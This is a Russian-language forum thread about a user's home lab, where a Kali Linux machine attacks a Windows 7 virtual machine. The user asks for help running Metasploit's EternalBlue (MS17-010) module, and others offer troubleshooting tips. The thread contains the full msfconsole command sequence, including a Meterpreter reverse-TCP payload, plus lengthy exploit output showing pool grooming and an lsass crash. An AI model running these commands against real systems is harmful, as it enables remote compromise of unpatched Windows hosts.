Не могу использовать ms17_010_eternalblue в Metasploit

DGDays · 09.03.2021

Добрый день!
Нашёл такой

Ссылка скрыта от гостей

. В нём используется ms17_010_eternalblue, но мне не удаётся его использовать. Пишет про неизвестную ошибку.

Команды:

Bash:

use auxiliary/scanner/smb/smb_ms07_010
show options
set RHOSTS <IP Address>
run
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS <client IP Address>
show payloads
set payloads windows/x64/meterpreter/reverse_tcp
set LHOST <your IP Address>
exploit

Ошибка:

Bash:

[*] Started reverse TCP handler on 192.168.1.122:4444
[*] 192.168.122.1:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.122.1:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] 192.168.122.1:445     - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.122.1:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
[*] Exploit completed, but no session was created.

Помогите, пожалуйста, решить проблему.

Атакую с Kali Linux, жертва - виртуалка с Win7

DGDays · 10.03.2021

Rook сказал(а):
Set verify_arch 0
Set verify_target 0

И странно что у машин разные подсети. Перепроверь свою машину. Почему у цели 122.167 а у твоей 1.122
Можешь проставить 0.0.0.0
И это ты пейлоад метерпретер добовляешь к експлойту. Попробуй без него
Unset payload

Без payload совсем не работает. Пишет что не выбрана нагрузка. Ну и опять же ошибки...

Rook · 10.03.2021

DGDays сказал(а):
Без payload совсем не работает. Пишет что не выбрана нагрузка. Ну и опять же ошибки...

Прикладывайте скриншоты пожалуйста

DGDays · 10.03.2021

Rook сказал(а):
Прикладывайте скриншоты пожалуйста

Без нагрузки:

Bash:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set verify_arch 0
verify_arch => false
msf6 exploit(windows/smb/ms17_010_eternalblue) > set verify_target 0
verify_target => false
msf6 exploit(windows/smb/ms17_010_eternalblue) > unset payload
Unsetting payload...
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[-] 192.168.122.167:445 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.

Ошибку уже видели. Но на всякий случай:

Bash:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.122:4444
[*] 192.168.122.167:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.122.167:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.122.167:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.122.167:445   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.122.167:445 - The target is vulnerable.
[*] 192.168.122.167:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.122.167:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.122.167:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[+] 192.168.122.167:445 - Connection established for exploitation.
[+] 192.168.122.167:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.122.167:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.122.167:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.122.167:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.122.167:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.122.167:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.122.167:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.122.167:445 - Sending all but last fragment of exploit packet
[*] 192.168.122.167:445 - Starting non-paged pool grooming
[+] 192.168.122.167:445 - Sending SMBv2 buffers
[+] 192.168.122.167:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.122.167:445 - Sending final SMBv2 buffers.
[*] 192.168.122.167:445 - Sending last fragment of exploit packet!
[*] 192.168.122.167:445 - Receiving response from exploit packet
[+] 192.168.122.167:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.122.167:445 - Sending egg to corrupted connection.
[*] 192.168.122.167:445 - Triggering free of corrupted buffer.
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[+] 192.168.122.167:445 - Connection established for exploitation.
[+] 192.168.122.167:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.122.167:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.122.167:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.122.167:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.122.167:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1     
[+] 192.168.122.167:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.122.167:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.122.167:445 - Sending all but last fragment of exploit packet
[*] 192.168.122.167:445 - Starting non-paged pool grooming
[+] 192.168.122.167:445 - Sending SMBv2 buffers
[+] 192.168.122.167:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.122.167:445 - Sending final SMBv2 buffers.
[*] 192.168.122.167:445 - Sending last fragment of exploit packet!
[*] 192.168.122.167:445 - Receiving response from exploit packet
[+] 192.168.122.167:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.122.167:445 - Sending egg to corrupted connection.
[*] 192.168.122.167:445 - Triggering free of corrupted buffer.
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[-] 192.168.122.167:445 - SMB Negotiation Failure -- this often occurs when lsass crashes.  The target may reboot in 60 seconds.
[*] Exploit completed, but no session was created.

Rook · 10.03.2021

DGDays сказал(а):

Без нагрузки:

Bash:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set verify_arch 0
verify_arch => false
msf6 exploit(windows/smb/ms17_010_eternalblue) > set verify_target 0
verify_target => false
msf6 exploit(windows/smb/ms17_010_eternalblue) > unset payload
Unsetting payload...
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[-] 192.168.122.167:445 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.

Ошибку уже видели. Но на всякий случай:

Bash:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.122:4444
[*] 192.168.122.167:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.122.167:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.122.167:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.122.167:445   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.122.167:445 - The target is vulnerable.
[*] 192.168.122.167:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.122.167:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.122.167:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[+] 192.168.122.167:445 - Connection established for exploitation.
[+] 192.168.122.167:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.122.167:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.122.167:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.122.167:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.122.167:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1   
[+] 192.168.122.167:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.122.167:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.122.167:445 - Sending all but last fragment of exploit packet
[*] 192.168.122.167:445 - Starting non-paged pool grooming
[+] 192.168.122.167:445 - Sending SMBv2 buffers
[+] 192.168.122.167:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.122.167:445 - Sending final SMBv2 buffers.
[*] 192.168.122.167:445 - Sending last fragment of exploit packet!
[*] 192.168.122.167:445 - Receiving response from exploit packet
[+] 192.168.122.167:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.122.167:445 - Sending egg to corrupted connection.
[*] 192.168.122.167:445 - Triggering free of corrupted buffer.
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[+] 192.168.122.167:445 - Connection established for exploitation.
[+] 192.168.122.167:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.122.167:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.122.167:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.122.167:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.122.167:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1   
[+] 192.168.122.167:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.122.167:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.122.167:445 - Sending all but last fragment of exploit packet
[*] 192.168.122.167:445 - Starting non-paged pool grooming
[+] 192.168.122.167:445 - Sending SMBv2 buffers
[+] 192.168.122.167:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.122.167:445 - Sending final SMBv2 buffers.
[*] 192.168.122.167:445 - Sending last fragment of exploit packet!
[*] 192.168.122.167:445 - Receiving response from exploit packet
[+] 192.168.122.167:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.122.167:445 - Sending egg to corrupted connection.
[*] 192.168.122.167:445 - Triggering free of corrupted buffer.
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.122.167:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.122.167:445 - Connecting to target for exploitation.
[-] 192.168.122.167:445 - SMB Negotiation Failure -- this often occurs when lsass crashes.  The target may reboot in 60 seconds.
[*] Exploit completed, but no session was created.

Перезапустить мсф. Запустите експлоит без пейлоада. Что бы все с 0 было. И попробуйте чистым модулем smb17_010 прогнать.
Делал так же даже с термукса,все работало. Иногда сам пейлоад капризничает. Нужно тонко подбирать метерпретер так как он не один в мсфе

joelblack · 10.03.2021

Если задача пощупать просто как это работает, то на tryhackme есть целая комната, где пошагово все расписывается + видео.

Blue

Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

tryhackme.com

Однако могут быть проблемы при использовании msf6

Errno::ECONNRESET: Connection reset by peer · Issue #14092 · rapid7/metasploit-framework

I try to run a exploit, but it appear a error: VM Oracle Windows 7 Professional VM Kali Linux 2020.3 metasploit v6.0.4-dev msf6 > use exploit/windows/smb/ms17_010_eternalblue [] No payload configur...

github.com

DGDays · 10.03.2021

Rook сказал(а):
Перезапустить мсф. Запустите експлоит без пейлоада. Что бы все с 0 было. И попробуйте чистым модулем smb17_010 прогнать.
Делал так же даже с термукса,все работало. Иногда сам пейлоад капризничает. Нужно тонко подбирать метерпретер так как он не один в мсфе

Знаете что весело? После перезапуска ноута сбились все настройки qemu и теперь нет сетевых интерфейсов его, из-за чего он вообще не пашет!
Установил oracle, но eternal blues пишет, что нет уязвимости

Поэтому я даже в замешательстве что делать

Rook · 10.03.2021

DGDays сказал(а):
Знаете что весело? После перезапуска ноута сбились все настройки qemu и теперь нет сетевых интерфейсов его, из-за чего он вообще не пашет!
Установил oracle, но eternal blues пишет, что нет уязвимости Поэтому я даже в замешательстве что делать

у вас вин7 тоже на virtual box?

DGDays · 10.03.2021

Rook сказал(а):
у вас вин7 тоже на virtual box?

В каком смысле тоже? Она одна на виртуалке -_-

Rook · 10.03.2021

DGDays сказал(а):
В каком смысле тоже? Она одна на виртуалке -_-

у вас основная система это кали линукс, а вторая вин7 на виртуалке, так ?

DGDays · 10.03.2021

Rook сказал(а):
у вас основная система это кали линукс, а вторая вин7 на виртуалке, так ?

Да

DGDays · 10.03.2021

Вот вывод eternal blues:

Rook · 10.03.2021

DGDays сказал(а):
Вот вывод eternal blues:
Посмотреть вложение 47759

не понял вообще что это

вы в армитаже чтоли мсфом пользуетесь ?

DGDays · 10.03.2021

Rook сказал(а):
не понял вообще что это
вы в армитаже чтоли мсфом пользуетесь ?

Это прога на windows для проверки всех устройств скти на уязвиность эту) До этого на qemu/virt писало что она есть. А на oracle пишет что нет, хотя настройки такие же поставил

DGDays · 11.03.2021

Лол, нашёл ещё одну ошибку. Иногда, когда пробую юзать уязвимость вылезает такое:

[-] 192.168.1.62:445 - SMB Negotiation Failure -- this often occurs when lsass crashes.  The target may reboot in 60 seconds.

DGDays · 12.03.2021

Проблема решена! Я сам забыл открыть порты, потому и не пахало XD

uni4on2 · 28.10.2022

DGDays сказал(а):
Проблема решена! Я сам забыл открыть порты, потому и не пахало XD

Всмысле открыл порты. В роутере чтоли ибо машина у тебя в локал хосте

Все сервисы Codeby

Поиск

Поиск

Не могу использовать ms17_010_eternalblue в Metasploit

DGDays

Active member

DGDays

DGDays

Active member

Rook

Codeby Team

DGDays

Active member

Rook

Codeby Team

joelblack

Blue

Errno::ECONNRESET: Connection reset by peer · Issue #14092 · rapid7/metasploit-framework

DGDays

Active member

Rook

Codeby Team

DGDays

Active member

Rook

Codeby Team

DGDays

Active member

DGDays

Active member

Rook

Codeby Team

DGDays

Active member

DGDays

Active member

DGDays

Active member

uni4on2

New member